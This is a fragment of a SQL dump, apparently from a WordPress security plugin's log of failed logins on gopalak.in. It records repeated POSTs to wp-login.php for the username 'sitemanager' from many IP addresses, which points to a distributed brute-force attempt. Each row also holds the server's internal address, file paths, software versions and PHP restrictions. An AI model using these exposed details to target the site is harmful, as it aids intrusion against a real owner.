12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746041743.826642;s:12:\"REQUEST_TIME\";i:1746041743;}}','164.90.225.186',0,'2025-05-01 01:05:45','1970-01-01 00:00:00'),(94614,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47412\";s:11:\"REMOTE_ADDR\";s:11:\"123.1.133.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746042059.690331;s:12:\"REQUEST_TIME\";i:1746042059;}}','123.1.133.4',0,'2025-05-01 01:11:01','1970-01-01 00:00:00'),(94615,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52408\";s:11:\"REMOTE_ADDR\";s:12:\"198.199.67.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746042383.382328;s:12:\"REQUEST_TIME\";i:1746042383;}}','198.199.67.5',0,'2025-05-01 01:16:25','1970-01-01 00:00:00'),(94616,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35138\";s:11:\"REMOTE_ADDR\";s:13:\"185.79.157.23\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746042692.9210019;s:12:\"REQUEST_TIME\";i:1746042692;}}','185.79.157.23',0,'2025-05-01 01:21:34','1970-01-01 00:00:00'),(94617,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56004\";s:11:\"REMOTE_ADDR\";s:15:\"133.242.131.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746043335.8140161;s:12:\"REQUEST_TIME\";i:1746043335;}}','133.242.131.226',0,'2025-05-01 01:32:17','1970-01-01 00:00:00'),(94618,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35254\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746043697.4338031;s:12:\"REQUEST_TIME\";i:1746043697;}}','162.0.232.248',0,'2025-05-01 01:38:19','1970-01-01 00:00:00'),(94619,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51724\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746044015.318928;s:12:\"REQUEST_TIME\";i:1746044015;}}','198.187.29.206',0,'2025-05-01 01:43:37','1970-01-01 00:00:00'),(94620,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37476\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746044327.0942121;s:12:\"REQUEST_TIME\";i:1746044327;}}','45.67.14.64',0,'2025-05-01 01:48:48','1970-01-01 00:00:00'),(94621,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51862\";s:11:\"REMOTE_ADDR\";s:12:\"144.76.3.233\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746044638.1192739;s:12:\"REQUEST_TIME\";i:1746044638;}}','144.76.3.233',0,'2025-05-01 01:54:00','1970-01-01 00:00:00'),(94622,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50976\";s:11:\"REMOTE_ADDR\";s:15:\"134.122.118.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746044952.7780049;s:12:\"REQUEST_TIME\";i:1746044952;}}','134.122.118.246',0,'2025-05-01 01:59:15','1970-01-01 00:00:00'),(94623,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60430\";s:11:\"REMOTE_ADDR\";s:11:\"195.7.5.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746045273.2065079;s:12:\"REQUEST_TIME\";i:1746045273;}}','195.7.5.237',0,'2025-05-01 02:04:35','1970-01-01 00:00:00'),(94624,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 